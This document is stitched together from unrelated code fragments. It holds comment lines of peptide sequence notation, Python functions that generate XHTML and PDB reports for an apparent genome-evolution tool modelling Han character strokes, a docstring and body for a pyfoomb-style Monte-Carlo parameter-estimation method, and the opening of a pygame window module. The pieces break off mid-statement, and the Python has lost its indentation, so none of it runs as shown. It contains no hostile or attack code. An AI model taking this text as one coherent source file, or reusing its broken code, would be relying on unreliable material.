# ,23:R3-94:R3|PEPTIDE3,PEPTIDE3,22:R3-96:R3|PEPTIDE2,PEPTIDE3,227:R3-227:R3|PEPTIDE
# 3,PEPTIDE3,262:R3-322:R3|PEPTIDE2,PEPTIDE1,221:R3-220:R3|PEPTIDE2,PEPTIDE2,145:R3-
# 201:R3|PEPTIDE1,PEPTIDE1,23:R3-94:R3|PEPTIDE2,PEPTIDE2,368:R3-426:R3|PEPTIDE3,PEPT
# IDE3,368:R3-426:R3$$$' , 'PEPTIDE1{Q.S.V.L.T.Q.P.P.S.A.S.G.T.P.G.Q.R.V.T.I.S.C.S.G
# .S.N.T.N.I.G.K.N.Y.V.S.W.Y.Q.Q.L.P.G.T.A.P.K.L.L.I.Y.A.N.S.N.R.P.S.G.V.P.D.R.F.S.G
# .S.K.S.G.T.S.A.S.L.A.I.S.G.L.R.S.E.D.E.A.D.Y.Y.C.A.S.W.D.A.S.L.N.G.W.V.F.G.G.G.T.K
# .L.T.V.L.G.Q.P.K.A.A.P.S.V.T.L.F.P.P.S.S.E.E.L.Q.A.N.K.A.T.L.V.C.L.I.S.D.F.Y.P.G.A
# .V.T.V.A.W.K.A.D.S.S.P.V.K.A.G.V.E.T.T.T.P.S.K.Q.S.N.N.K.Y.A.A.S.S.Y.L.S.L.T.P.E.Q
# .W.K.S.H.R.S.Y.S.C.Q.V.T.H.E.G.S.T.V.E.K.T.V.A.P.T.E.C.S}|PEPTIDE2{E.V.Q.L.L.E.S.G
# .G.G.L.V.Q.P.G.G.S.L.R.L.S.C.A.A.S.G.F.T.F.S.N.A.W.M.S.W.V.R.Q.A.P.G.K.G.L.E.W.V.S
# .S.I.S.V.G.G.H.R.T.Y.Y.A.D.S.V.K.G.R.S.T.I.S.R.D.N.S.K.N.T.L.Y.L.Q.M.N.S.L.R.A.E.D
# .T.A.V.Y.Y.C.A.R.I.R.V.G.P.S.G.G.A.F.D.Y.W.G.Q.G.T.L.V.T.V.S.S.A.S.T.K.G.P.S.V.F.P
# .L.A.P.S.S.K.S.T.S.G.G.T.A.A.L.G.C.L.V.K.D.Y.F.P.E.P.V.T.V.S.W.N.S.G.A.L.T.S.G.V.H
# .T.F.P.A.V.L.Q.S.S.G.L.Y.S.L.S.S.V.V.T.V.P.S.S.S.L.G.T.Q.T.Y.I.C.N.V.N.H.K.P.S.N.T
# .K.V.D.K.K.V.E.P.K.S.C.D.K.T.H.T.C.P.P.C.P.A.P.E.L.L.G.G.P.S.V.F.L.F.P.P.K.P.K.D.T
# .L.M.I.S.R.T.P.E.V.T.C.V.V.V.D.V.S.H.E.D.P.E.V.K.F.N.W.Y.V.D.G.V.E.V.H.N.A.K.T.K.P
# .R.E.E.Q.Y.N.S.T.Y.R.V.V.S.V.L.T.V.L.H.Q.D.W.L.N.G.K.E.Y.K.C.K.V.S.N.K.A.L.P.A.P.I
# .E.K.T.I.S.K.A.K.G.Q.P.R.E.P.Q.V.Y.T.L.P.P.S.R.D.E.L.T.K.N.Q.V.S.L.T.C.L.V.K.G.F.Y
# .P.S.D.I.A.V.E.W.E.S.N.G.Q.P.E.N.N.Y.K.T.T.P.P.V.L.D.S.D.G.S.F.F.L.Y.S.K.L.T.V.D.K
# .S.R.W.Q.Q.G.N.V.F.S.C.S.V.M.H.E.A.L.H.N.H.Y.T.Q.K.S.L.S.L.S.P.G.K}|PEPTIDE3{E.V.Q
# .L.L.E.S.G.G.G.L.V.Q.P.G.G.S.L.R.L.S.C.A.A.S.G.F.T.F.S.N.A.W.M.S.W.V.R.Q.A.P.G.K.G
# .L.E.W.V.S.S.I.S.V.G.G.H.R.T.Y.Y.A.D.S.V.K.G.R.S.T.I.S.R.D.N.S.K.N.T.L.Y.L.Q.M.N.S
# .L.R.A.E.D.T.A.V.Y.Y.C.A.R.I.R.V.G.P.S.G.G.A.F.D.Y.W.G.Q.G.T.L.V.T.V.S.S.A.S.T.K.G
# .P.S.V.F.P.L.A.P.S.S.K.S.T.S.G.G.T.A.A.L.G.C.L.V.K.D.Y.F.P.E.P.V.T.V.S.W.N.S.G.A.L
# .T.S.G.V.H.T.F.P.A.V.L.Q.S.S.G.L.Y.S.L.S.S.V.V.T.V.P.S.S.S.L.G.T.Q.T.Y.I.C.N.V.N.H
# .K.P.S.N.T.K.V.D.K.K.V.E.P.K.S.C.D.K.T.H.T.C.P.P.C.P.A.P.E.L.L.G.G.P.S.V.F.L.F.P.P
# .K.P.K.D.T.L.M.I.S.R.T.P.E.V.T.C.V.V.V.D.V.S.H.E.D.P.E.V.K.F.N.W.Y.V.D.G.V.E.V.H.N
# .A.K.T.K.P.R.E.E.Q.Y.N.S.T.Y.R.V.V.S.V.L.T.V.L.H.Q.D.W.L.N.G.K.E.Y.K.C.K.V.S.N.K.A
# .L.P.A.P.I.E.K.T.I.S.K.A.K.G.Q.P.R.E.P.Q.V.Y.T.L.P.P.S.R.D.E.L.T.K.N.Q.V.S.L.T.C.L
# .V.K.G.F.Y.P.S.D.I.A.V.E.W.E.S.N.G.Q.P.E.N.N.Y.K.T.T.P.P.V.L.D.S.D.G.S.F.F.L.Y.S.K
# .L.T.V.D.K.S.R.W.Q.Q.G.N.V.F.S.C.S.V.M.H.E.A.L.H.N.H.Y.T.Q.K.S.L.S.L.S.P.G.K}|PEPT
# IDE4{Q.S.V.L.T.Q.P.P.S.A.S.G.T.P.G.Q.R.V.T.I.S.C.S.G.S.N.T.N.I.G.K.N.Y.V.S.W.Y.Q.Q
# .L.P.G.T.A.P.K.L.L.I.Y.A.N.S.N.R.P.S.G.V.P.D.R.F.S.G.S.K.S.G.T.S.A.S.L.A.I.S.G.L.R
# .S.E.D.E.A.D.Y.Y.C.A.S.W.D.A.S.L.N.G.W.V.F.G.G.G.T.K.L.T.V.L.G.Q.P.K.A.A.P.S.V.T.L
# | |
iStrokeEnd = min(iStrokeStart + Constants.dStrokeRangesPerLine, len(aryStrokes))
strStrokeDetails += "<table class='stroke-range'><tr><th>Stroke</th>%s</tr><tr><th>Bases</th>%s</tr><tr><th>Han #</th>%s</tr></table>" % (
''.join([ '<td><a href="#s%d">%d</a></td>' % (i, i+1) for i in range(iStrokeStart,iStrokeEnd) ]),
''.join([ '<td><a href="#s%d">%04d—%04d</a></td>' % (i, aryStrokes[i].rgBases.baseFirst, aryStrokes[i].rgBases.baseLast) for i in range(iStrokeStart,iStrokeEnd) ]),
''.join([ '<td>%d</td>' % aryStrokes[i].correspondsTo for i in range(iStrokeStart,iStrokeEnd) ]))
strDigits = ' '.join([ '%d%d%d' % (i%10,(i+1)%10,(i+2)%10) for i in range(1,Constants.dBasesPerLine,3) ])
strCodonTable = ''
if not genome.codonTable.isStandard():
strCodonTable += '<h3>Codon Table - %s</h3>' % genome.codonTable.uuid
aryEntries = genome.codonTable.entries()
for iEntryRow in range(0,len(aryEntries),Constants.dCodonTableEntriesPerLine):
aryEntriesRow = aryEntries[iEntryRow:iEntryRow+Constants.dCodonTableEntriesPerLine]
strCodonTableRow = ''
for iEntrySet in range(0,len(aryEntriesRow),Constants.dCodonTableEntriesPerSet):
aryEntriesSet = aryEntriesRow[iEntrySet:iEntrySet+Constants.dCodonTableEntriesPerSet]
strCodonTableRow += "<td><table class='codon-row'><tr><td>%s</td><td>%s</td><td>%s</td><td>%s</td></tr>" % (aryEntriesSet[0][0], aryEntriesSet[1][0], aryEntriesSet[2][0], aryEntriesSet[3][0])
strCodonTableRow += "<tr><td class='%s'>%s</td><td class='%s'>%s</td><td class='%s'>%s</td><td class='%s'>%s</td></tr></table></td>" % (
(genome.codonTable.hasStandardMapping(aryEntriesSet[0][0]) and 'acids' or 'acid-nonstandard'),
aryEntriesSet[0][1],
(genome.codonTable.hasStandardMapping(aryEntriesSet[1][0]) and 'acids' or 'acid-nonstandard'),
aryEntriesSet[1][1],
(genome.codonTable.hasStandardMapping(aryEntriesSet[2][0]) and 'acids' or 'acid-nonstandard'),
aryEntriesSet[2][1],
(genome.codonTable.hasStandardMapping(aryEntriesSet[3][0]) and 'acids' or 'acid-nonstandard'),
aryEntriesSet[3][1])
strCodonTable += "<table class='codon-table'>%s</table>" % strCodonTableRow
iStroke = 0
strCodonDetails = ''
for i in range(0,len(genome.bases),Constants.dBasesPerLine):
bases = genome.bases[i:i+Constants.dBasesPerLine]
aryCodons = Codons.Constants.reSPLITCODONS.findall(bases)
aryVectors = list(map(genome.codonTable.codonToVectorName, aryCodons))
nBases = len(aryCodons) * 3
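# Annotate codons with stroke boundaries: open an anchored <span> at the codon
# containing a stroke's first base and close it at the codon containing its
# last base (rgBases positions are 1-based, hence the '- i - 1' offset).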
while iStroke < len(aryStrokes):
stroke = aryStrokes[iStroke]
iBase = stroke.rgBases.baseFirst - i - 1
if iBase < nBases:
iCodon = max(int(iBase/3),0)
aryCodons[iCodon] = ('<span id="s%d" class="stroke-range">' % iStroke) + aryCodons[iCodon]
iBase = stroke.rgBases.baseLast - i - 1
if iBase >= 0 and iBase < nBases:
iCodon = int(iBase/3)
aryCodons[iCodon] += '</span>'
iStroke += 1
else:
break
strCodonDetails += _HTML_TRIAL_CODON_ROW % (i+1, i+Constants.dBasesPerLine,
strDigits,
' '.join(aryCodons),
' '.join(aryVectors))
return (cBases, cStrokeBases, strStrokeDetails, strCodonTable, strCodonDetails)
#------------------------------------------------------------------------------
# Function: buildXHTML
#
# Generate XHTML output
#------------------------------------------------------------------------------
def buildXHTML(aryData, strUnicode, han):
Common.say('Creating XHTML output', False)
aryTrials = [ [ os.path.splitext(os.path.basename(strData))[0]+'.html', genome ] for strData, genome in aryData ]
# Build hyperlink path from the genome down
strDefaultNavigation = ' '
strTrialNavigation = ' '
aryPathNavigation = []
strPath = Globals.names.idGenome
if Globals.names.pathExpandReport:
strPath = os.path.join(strPath, Globals.names.pathExpandReport)
strTail = os.path.split(strPath)[1]
nDepth = 0
while strPath:
strPath, strDir = os.path.split(strPath)
aryPath = [ '..' for i in range(nDepth) ]
aryPath.append('default.html')
aryPathNavigation.append('<a class="pathpart" href="%s">%s</a>' % (os.path.join(*aryPath), strDir))
nDepth += 1
aryPathNavigation.append(' ')
aryPathNavigation.reverse()
strDefaultNavigation = '/'.join(aryPathNavigation[:-1])
if not Globals.names.strExpand:
strDefaultNavigation = '%s%s' % ( '<span class="sibling-prev"> </span><span class="sibling-down"> </span><span class="sibling-next"> </span>',
'/'.join([ strDefaultNavigation, ('<span class="pathpart">%s</span>' % strTail) ]))
else:
strDefaultNavigation = '%s%s' % ( '<span class="sibling-prev"> </span><span class="sibling-down"> </span><span class="sibling-next"> </span>',
'/'.join([ strDefaultNavigation, ('<a class="pathpart" href="../%s.html">%s</a>' % (strTail, strTail)) ]))
strTrialNavigation = '/'.join(aryPathNavigation)
# Build the default HTML file
fileDefault = None
genome = aryTrials[-1][1]
statistics = genome.statistics
fileDefault = open(os.path.join(Globals.names.pathReport, 'default.html'), 'w')
fileDefault.write(_HTML_HEADER % (statistics.trialFirst, statistics.trialLast))
strDate, strTime = genome.creationDate and genome.creationDate.split('T') or [ '', '' ]
strAuthor = genome.author or ''
if genome.creationTool:
strCreationTool = genome.creationTool + (genome.creationParameters and (' — ' + genome.creationParameters) or '')
strAuthor += strAuthor and (' (%s)' % strCreationTool) or strCreationTool
fileDefault.write(_HTML_TITLE_SECTION % (strUnicode,
statistics.trialFirst, statistics.trialLast,
strDate, strTime[:-1], strAuthor,
strDefaultNavigation))
fileDefault.write(_HTML_HEADER_SECTION % (statistics.fitness,
statistics.maxFitness.value, statistics.maxFitness.trial,
statistics.minFitness.value, statistics.minFitness.trial,
statistics.score,
statistics.maxScore.value, statistics.maxScore.trial,
statistics.minScore.value, statistics.minScore.trial,
statistics.totalRollbacks,
statistics.maxRollbacks.countRollbacks, statistics.maxRollbacks.trial,
statistics.minRollbacks.countRollbacks, statistics.minRollbacks.trial,
statistics.changeMutations.accepted, statistics.changeMutations.silent,
statistics.copyMutations.accepted,
statistics.deletionMutations.accepted,
statistics.insertionMutations.accepted,
statistics.transposeMutations.accepted))
strIcons = ''
iDefaultSVG = 0
for iTrialFirst in range(0, len(aryTrials), Constants.cDefaultIcons):
nIcons = min(len(aryTrials) - (Constants.cDefaultIcons * iDefaultSVG), Constants.cDefaultIcons)
dxRow = ((Constants.dxDefault + Constants.dxDefaultBorder) * nIcons) - Constants.dxDefaultBorder
iTrialLast = min(iTrialFirst+Constants.cDefaultIcons, len(aryTrials))
strLinks = '\n'.join([ '<th><a href="%s">%d–%d</a></th>' % (aryTrials[i][0], aryTrials[i][1].statistics.trialFirst, aryTrials[i][1].statistics.trialLast) for i in range(iTrialFirst,iTrialLast) ])
strIcons += _HTML_DEFAULT_ROW % (strLinks, nIcons, dxRow, Constants.dyDefault, 'default%d.svg' % iDefaultSVG)
iDefaultSVG += 1
fileDefault.write(_HTML_DEFAULT_MAIN % strIcons)
fileDefault.write(_HTML_FOOTER)
for iTrial in range(len(aryTrials)):
strTrial = aryTrials[iTrial][0]
genome = aryTrials[iTrial][1]
gene = genome.gene
statistics = genome.statistics
fileTrial = open(os.path.join(Globals.names.pathReport, strTrial), 'w')
fileTrial.write(_HTML_HEADER % ((not statistics and -1 or statistics.trialFirst), (not statistics and -1 or statistics.trialLast)))
strTrialPrev = iTrial > 1 and ('<a class="sibling-prev" href="%s">«%s</a>' % (aryTrials[iTrial-1][0], Common.Constants.reTRIALFILE.match(aryTrials[iTrial-1][0]).groups()[0])) or (iTrial == 1 and '<a class="sibling-prev" href="initial.html">«initial</a>' or '<span class="sibling-prev"> </span>')
strTrialNext = iTrial == len(aryTrials)-1 and '<span class="sibling-next"> </span>' or (iTrial == len(aryTrials)-2 and '<a class="sibling-next" href="final.html">final»</a>' or ('<a class="sibling-next" href="%s">%s»</a>' % (aryTrials[iTrial+1][0], Common.Constants.reTRIALFILE.match(aryTrials[iTrial+1][0]).groups()[0])))
strDate, strTime = genome.creationDate and genome.creationDate.split('T') or [ '', '' ]
strAuthor = genome.author or ''
if genome.creationTool:
strCreationTool = genome.creationTool + (genome.creationParameters and (' — ' + genome.creationParameters) or '')
strAuthor += strAuthor and (' (%s)' % strCreationTool) or strCreationTool
fileTrial.write(_HTML_TITLE_SECTION % (strUnicode,
(not statistics and -1 or statistics.trialFirst),
(not statistics and -1 or statistics.trialLast),
strDate, strTime[:-1], strAuthor,
'%s%s%s%s' % (strTrialPrev, '<script type="text/javascript">document.write(getExpandedLink());</script>', strTrialNext, '/'.join([ strTrialNavigation, os.path.splitext(strTrial)[0] ]))))
if statistics:
fileTrial.write(_HTML_HEADER_SECTION % (statistics.fitness or 0,
statistics.maxFitness and statistics.maxFitness.value or 0,
not statistics.maxFitness and -1 or statistics.maxFitness.trial,
statistics.minFitness and statistics.minFitness.value or 0,
not statistics.minFitness and -1 or statistics.minFitness.trial,
statistics.score or 0,
statistics.maxScore and statistics.maxScore.value or 0,
not statistics.maxScore and -1 or statistics.maxScore.trial,
statistics.minScore and statistics.minScore.value or 0,
not statistics.minScore and -1 or statistics.minScore.trial,
statistics.totalRollbacks or 0,
statistics.maxRollbacks and statistics.maxRollbacks.countRollbacks or 0,
not statistics.maxRollbacks and -1 or statistics.maxRollbacks.trial,
statistics.minRollbacks and statistics.minRollbacks.countRollbacks or 0,
not statistics.minRollbacks and -1 or statistics.minRollbacks.trial,
statistics.changeMutations and statistics.changeMutations.accepted or 0,
statistics.changeMutations and statistics.changeMutations.silent or 0,
statistics.copyMutations and statistics.copyMutations.accepted or 0,
statistics.deletionMutations and statistics.deletionMutations.accepted or 0,
statistics.insertionMutations and statistics.insertionMutations.accepted or 0,
statistics.transposeMutations and statistics.transposeMutations.accepted or 0))
else:
fileTrial.write(_HTML_HEADER_SECTION % (0, 0, -1, 0, -1, 0, 0, -1, 0, -1, 0, 0, -1, 0, -1, 0, 0, 0, 0, 0, 0))
strSVG = _HTML_TRIAL_ROW % ('svg', 'svg',
Globals.fHTMLSVG and '-' or '+',
'Gene',
_HTML_TRIAL_CANVAS % ('svg',
Globals.fHTMLSVG and 'block; border: none;' or 'none; border: none;',
'<embed id="svg" width="%d" height="%d" src="%s" />' % (Constants.dxTrial, Constants.dyTrial, os.path.splitext(strTrial)[0] + '.svg')))
strScores = ''
if gene.score:
strScores = _HTML_TRIAL_ROW % ('scores', 'scores',
Globals.fHTMLScores and '-' or '+',
'Scores',
_HTML_TRIAL_CANVAS % ('scores',
Globals.fHTMLScores and 'block' or 'none',
_HTML_TRIAL_SCORES % (statistics.fitness, statistics.countBases, statistics.units,
gene.score, gene.scale or 0, gene.placement or 0, gene.illegalOverlaps or 0, gene.missingOverlaps or 0, gene.marks or 0,
'\n'.join([ _HTML_TRIAL_GROUP_SCORE % (g.score or 0, g.deviation or 0, g.extraLength or 0, g.scale or 0, g.placement or 0, g.illegalOverlaps or 0, g.missingOverlaps or 0, g.dropouts or 0) for g in gene.aryGroups ]),
'\n'.join([ _HTML_TRIAL_STROKE_SCORE % (s.deviation or 0, s.extraLength or 0, s.dropouts or 0) for s in gene.aryStrokes]))))
strMutations = ''
if genome.lineage and (genome.lineage.acceptedMutations or genome.lineage.rejectedMutations):
strMutations = _HTML_TRIAL_ROW % ('mutations', 'mutations',
Globals.fHTMLMutations and '-' or '+',
'Mutations',
_HTML_TRIAL_CANVAS % ('mutations',
Globals.fHTMLMutations and 'block' or 'none',
'<h3>Accepted</h3><ol>%s</ol><div class="rejected"><h3>Rejected - %d</h3>%s</div>' % (
genome.lineage.acceptedMutations and '\n'.join([ '<li>%s</li>' % str(m) for m in genome.lineage.acceptedMutations.mutations ]) or '',
len(genome.lineage.rejectedMutations),
'\n'.join([ '<div class="reject" style="background-color: %s;"><h4>%s</h4><ol>%s</ol></div>' % (
(i % 2) and '#fff' or '#eee',
genome.lineage.rejectedMutations[i].description,
'\n'.join([ '<li>%s</li>' % str(m) for m in genome.lineage.rejectedMutations[i].mutations ])) for i in range(len(genome.lineage.rejectedMutations)) ]))))
cBases, cStrokeBases, strStrokeDetails, strCodonTable, strCodonDetails = htmlCollectCodons(genome)
strCodons = _HTML_TRIAL_ROW % ('codons', 'codons',
Globals.fHTMLCodons and '-' or '+',
'Codons',
_HTML_TRIAL_CANVAS % ('codons',
Globals.fHTMLCodons and 'block' or 'none',
_HTML_TRIAL_CODONS % (cBases, (cBases / 3), cStrokeBases, (cStrokeBases / 3), (cBases-cStrokeBases), ((cBases-cStrokeBases) / 3), len(genome.gene.aryStrokes), strStrokeDetails, strCodonTable, strCodonDetails)))
fileTrial.write(_HTML_TRIAL_MAIN % ('%s%s%s%s' % (strSVG, strScores, strMutations, strCodons)))
fileTrial.close()
Common.say('.', False)
buildExpandedLists(aryData)
Common.say('')
buildSVG(aryData, han, False)
return
#------------------------------------------------------------------------------
# Function: buildPDB
#
# Generate PDB output
#------------------------------------------------------------------------------
def buildPDB(aryData):
Common.say('Creating PDB output for trials %s' % ','.join([ str(iTrial) for iTrial in Globals.aryPDB[0] ]))
iData = 0
import functools  # local import: cmp_to_key adapts the two-argument comparator
# list.sort() takes a key function (required on Python 3; cmp_to_key also
# exists on Python 2.7, so this form works on both).
Globals.aryPDB[0].sort(key=functools.cmp_to_key(Common.cmpDataFilenames))
nPitch = Globals.aryPDB[1]
nScale = Globals.aryPDB[2]
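# Walk the requested trials and loaded data files in step (both sorted with
# the same comparator), skipping any requested trial that has no matching
# data file rather than aborting the whole run.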
for strTrial in Globals.aryPDB[0]:
strTrialFile = (strTrial != 'initial' and strTrial != 'final' and ('trial' + strTrial) or strTrial) + '.xml'
while iData < len(aryData):
nCmp = Common.cmpDataFilenames(strTrialFile, os.path.basename(aryData[iData][0]))
if nCmp <= 0:
break
iData += 1
if iData >= len(aryData) or nCmp < 0:
Common.sayError('Skipping PDB creation for %s - %s is not a valid trial' % (strTrial, strTrial))
continue
Common.say('Creating PDB file for trial %s' % strTrial)
urlGenome, genome = aryData[iData]
filePDB = open(os.path.join(Globals.names.pathReport, os.path.splitext(os.path.basename(urlGenome))[0]+'.pdb'), 'w')
filePDB.write(_PDB_HEADER)
filePDB.write(_PDB_TITLE % "")
if genome.statistics and genome.statistics.trialLast:
filePDB.write(_PDB_TITLE % ('Trial %d created on %s' % (genome.statistics.trialLast, genome.creationDate or 'unknown')))
if genome.author:
filePDB.write(_PDB_AUTHOR % genome.author)
filePDB.write('\n')
filePDB.write(_PDB_REMARK4)
filePDB.write('\n')
filePDB.write(_PDB_ORIG)
filePDB.write(_PDB_SCALE)
filePDB.write('\n')
aryHETATM = []
aryCONECT = []
iSerial = 1
z = 0
for segment in genome.gene.arySegments:
if segment.coherent:
cChain = 'c'
zIncrement = 0
else:
cChain = 'i'
zIncrement = nPitch
iChain = 1
for pt in segment.aryPoints:
aryHETATM.append(_PDB_HETATM % (iSerial, cChain, iChain, (pt.x * nScale), (pt.y * nScale), (z *
metric : str
The metric according to which the loss to be minimized is calculated.
Can be one of `negLL` (negative log-likelihood), `SS` (sum of squares), or `WSS` (weighted sum of squares).
Default is `negLL`, which implies that the corresponding Measurement objects are accordingly specified.
report_level : int
Enables informative output about the estimation process.
Default is 0, which is no output.
1 = Prints a dot for each processing batch, the total runtime, and the ratio of samples that reached convergence.
2 = Prints as for 1, but with more information on each batch.
3 = Prints additionally the runtime of each batch, as well as a summary of the obtained parameter distributions.
4 = Prints additionally the reason for an MC sample to finish (i.e.,
whether convergence or the maximum number of evolutions was reached).
5 = Prints additionally information on the creation of the archipelagos for each batch.
6 = Prints additionally the current evolution for each MC sample, and reports any handled integration errors.
optimizers : List[str] or str
A list of names for the pygmo optimization algorithms of choice. For the algorithms that can be conveniently used,
see the `PygmoOptimizers` class of this module.
In case a list with one item is used, this optimizer is used for all islands, whether their
number is defined explicitly or implicitly (via the default of `n_islands`).
In case a list with >1 optimizers is used, the corresponding number of islands will be created within the archipelago.
The currently supported list of optimizers can be found at pyfoomb.generalized_islands.PygmoOptimizers.optimizers
Default is `de1220`, which makes each island use this algorithm.
optimizers_kwargs : List[dict] or dict
A list of optimizer_kwargs as dicts, corresponding to the list of optimizers.
In case >1 optimizers are used together with a 1-item list of optimizer_kwargs, that item will be applied to all of the optimizers.
Default is `{}`, i.e. no additional optimizer kwargs.
rel_pop_size : float
Determines the population size on each island, relative to the number of unknowns to be estimated,
i.e. pop_size = rel_pop_size * len(unknowns), rounded to the next integer.
Default is 10, which creates population sizes 10 times the number of unknowns.
evolutions : int
Defines how often the populations on the islands are evolved.
Migrations between the populations of the islands occur after each finished evolution.
Migration depends on the topology of the archipelago, as well as on the defined migration policies,
which are parts of `archipelago_kwargs`.
Default is 5, which triggers five rounds of evolution.
archipelago_kwargs : dict
The keyword arguments for instantiation of the archipelago.
In case `archipelago_kwargs` has no key `t`, the `pygmo.fully_connected()` topology will be used.
Default is {}, i.e. an empty dictionary, which implies the use of `pygmo.fully_connected()` topology.
atol_islands : float
Defines a stopping criterion that is checked after each evolution.
If the std of the islands' losses < atol_islands + rtol_islands * abs(mean(islands' losses)), then the optimization is stopped.
Default is None, which implies no effect for this argument.
rtol_islands : float
Defines a stopping criterion that is checked after each evolution.
If the std of the islands' losses < atol_islands + rtol_islands * abs(mean(islands' losses)), then the optimization is stopped.
Default is 1e-6.
n_islands : int
Specifies the number of parallel estimations per MC sample for all archipelagos in an estimation batch.
In case a list of optimizers is provided, the number of islands is implicitly defined by its length.
Must use values > 1.
Default is 4.
handle_CVodeError : bool
Catches CVodeError raised by the solver, in order to not interrupt the estimations for toxic parameter values.
Default is True.
loss_calculator : LossCalculator
By subclassing `LossCalculator`, user-defined constraints can be implemented. The resulting subclass needs to be provided.
Default is LossCalculator, which implements no additional constraints.
jobs_to_save : int
Set to repeatedly run the specified number of MC samples and to save the results from each repeat to file.
Default is None, which causes no result storage to file.
max_memory_share : float
Defines the allowed memory share in usage, for which no repeats are run anymore. Has only effect if `jobs_to_save` is not None.
Default is 0.95, meaning that repeats are only run if the used memory share is less than 95 %.
Returns
-------
estimates : pandas.DataFrame
The values from repeated estimation for the requested unknowns.
Only converged estimations are included.
Raises
------
AttributeError
Measurements have no errors.
ValueError
Degree of archipelago parallelization is < 2.
TypeError
A list containing not only Measurement objects is provided.
KeyError
Non-unique unknowns detected.
ValueError
Invalid parameters shall be estimated.
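Example
-------
A minimal usage sketch (assuming a readily configured `caretaker` instance and a
list `measurements` of Measurement objects with specified errors; all names and
values are illustrative, not prescribed by this method)::
    estimates = caretaker.estimate_parallel_MC_sampling(
        unknowns=['rate_constant'],
        measurements=measurements,
        bounds=[(0.0, 10.0)],
        mc_samples=50,
        report_level=1,
    )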
"""
if jobs_to_save is None:
_estimate = self._estimate_parallel_MC_sampling(
unknowns=unknowns,
measurements=measurements,
bounds=bounds,
mc_samples=mc_samples,
reuse_errors_as_weights=reuse_errors_as_weights,
metric=metric,
report_level=report_level,
optimizers=optimizers,
optimizers_kwargs=optimizers_kwargs,
rel_pop_size=rel_pop_size,
evolutions=evolutions,
archipelago_kwargs=archipelago_kwargs,
atol_islands=atol_islands,
rtol_islands=rtol_islands,
n_islands=n_islands,
handle_CVodeError=handle_CVodeError,
loss_calculator=loss_calculator,
)
return pandas.DataFrame.from_dict(_estimate)
_estimate_batches = []
session_id = int(time.monotonic())
for i in range(1, jobs_to_save+1):
curr_memory_share = psutil.virtual_memory().percent/100
if curr_memory_share > max_memory_share:
print(f'Cannot run MC estimation job due to low memory: {(1-curr_memory_share)*100:.2f} % free memory left')
else:
_estimate_batch = self._estimate_parallel_MC_sampling(
unknowns=unknowns,
measurements=measurements,
bounds=bounds,
mc_samples=mc_samples,
reuse_errors_as_weights=reuse_errors_as_weights,
metric=metric,
report_level=report_level,
optimizers=optimizers,
optimizers_kwargs=optimizers_kwargs,
rel_pop_size=rel_pop_size,
evolutions=evolutions,
archipelago_kwargs=archipelago_kwargs,
atol_islands=atol_islands,
rtol_islands=rtol_islands,
n_islands=n_islands,
handle_CVodeError=handle_CVodeError,
loss_calculator=loss_calculator,
)
_filename = f'{self.model_name}_MC-sample-estimates_session-id-{session_id}_job-{i}.xlsx'
_df = pandas.DataFrame.from_dict(_estimate_batch)
_estimate_batches.append(_df)
_df.to_excel(_filename)
if report_level > 0:
print(f'Current memory usage is {psutil.virtual_memory().percent:.2f} %.\nSaved results of job #{i} to file: {_filename}\n')
return pandas.concat(_estimate_batches, ignore_index=True)
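# Illustrative sketch (not part of the original source): the atol/rtol stopping
# criterion documented above is evaluated after each evolution roughly as
#     import numpy
#     stop = numpy.std(losses) < atol_islands + rtol_islands * numpy.abs(numpy.mean(losses))
# where `losses` would hold the current best loss of each island (hypothetical name).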
def _estimate_parallel_MC_sampling(self,
unknowns:list,
measurements:List[Measurement],
bounds:List[Tuple],
mc_samples:int=25,
reuse_errors_as_weights:bool=True,
metric:str='negLL',
report_level:int=0,
optimizers:List[str]='de1220',
optimizers_kwargs:List[dict]={},
rel_pop_size:float=10.0,
evolutions:int=25,
archipelago_kwargs:dict={},
atol_islands:float=None,
rtol_islands:float=1e-6,
n_islands:int=4,
handle_CVodeError:bool=True,
loss_calculator:LossCalculator=LossCalculator,
) -> dict:
"""
Performs Monte-Carlo sampling from measurements to create new measurements, according to the statistical distribution of the respective Measurement objects.
For each newly created measurement, the requested unknowns (parameters) are estimated, resulting in an empirical distribution of parameter values.
These empirical distributions for the parameters can be assessed for uncertainties and correlations.
For each MC sample, a parallel estimation procedure is carried out, for details see methods `estimate_parallel` and `estimate_parallel_continued`.
Depending on the available number of CPUs on your machine, these estimation procedures are run in parallel.
For the selection of suitable hyperparameters, e.g. which optimizers to use, use method `estimate_parallel` and refer to the corresponding Jupyter notebooks.
NOTE: To increase the number of MC samples to an arbitrarily high number, run this method several times and store intermediate results.
Afterwards, these can be merged.
NOTE: This method puts considerable computational load on your machine.
Arguments
---------
unknowns : dict or list
The parameters to be estimated. Can be any of the model parameters, initial values or observation parameters.
measurements : List[Measurement]
The measurements from which the parameters are to be estimated.
bounds : List[tuple]
List of tuples (lower, upper), one tuple for each parameter. Must be provided when using the global optimizer.
Default is None.
Keyword arguments
-----------------
mc_samples : int
The number of MC samples that shall be drawn from the measurement data.
Default is 25.
reuse_errors_as_weights : bool
Uses the measurement errors as weights for each set of measurement samples drawn.
Default is True.
metric : str
The metric according to which the loss to be minimized is calculated.
Can be one of, e.g. `negLL` (negative log-likelihood), `SS` (sum of squares), or `WSS` (weighted sum of squares).
Default is `negLL`, which implies that the corresponding Measurement objects are accordingly specified.
report_level : int
Enables informative output about the estimation process.
Default is 0, which is no output.
1 = Prints a dot for each processing batch, the total runtime and the ratio of samples that reached convergence.
2 = Prints like level 1, but with more information on each batch.
3 | |
<filename>my_pygame/window.py
# -*- coding: utf-8 -*-
# pylint: disable=too-many-lines
import os
import sys
import configparser
from typing import Callable, Any, Union, Optional, Sequence
from contextlib import contextmanager
from functools import wraps
import pygame
from .theme import ThemeNamespace
from .drawable import Drawable, Animation
from .focusable import Focusable
from .text import Text
from .list import DrawableList
from .grid import Grid, GridCell
from .joystick import JoystickList
from .keyboard import Keyboard
from .cursor import Cursor
from .clock import Clock
from .colors import BLACK, WHITE, BLUE
from .resources import Resources
from .multiplayer import ServerSocket, ClientSocket
from .path import set_constant_file
def set_value_in_range(value: float, min_value: float, max_value: float) -> float:
if value < min_value:
value = min_value
elif value > max_value:
value = max_value
return value
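# Equivalent to min(max(value, min_value), max_value),
# e.g. set_value_in_range(1.5, 0.0, 1.0) -> 1.0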
class WindowExit(BaseException):
pass
class WindowCallback:
def __init__(self, master, wait_time: float, callback: Callable[..., Any], args: tuple[Any, ...], kwargs: dict[str, Any]):
self.__master = master
self.__wait_time = wait_time
self.__callback = callback
self.__args = args
self.__kwargs = kwargs
self.__clock = Clock(start=True)
def __call__(self):
if self.__clock.elapsed_time(self.__wait_time, restart=False):
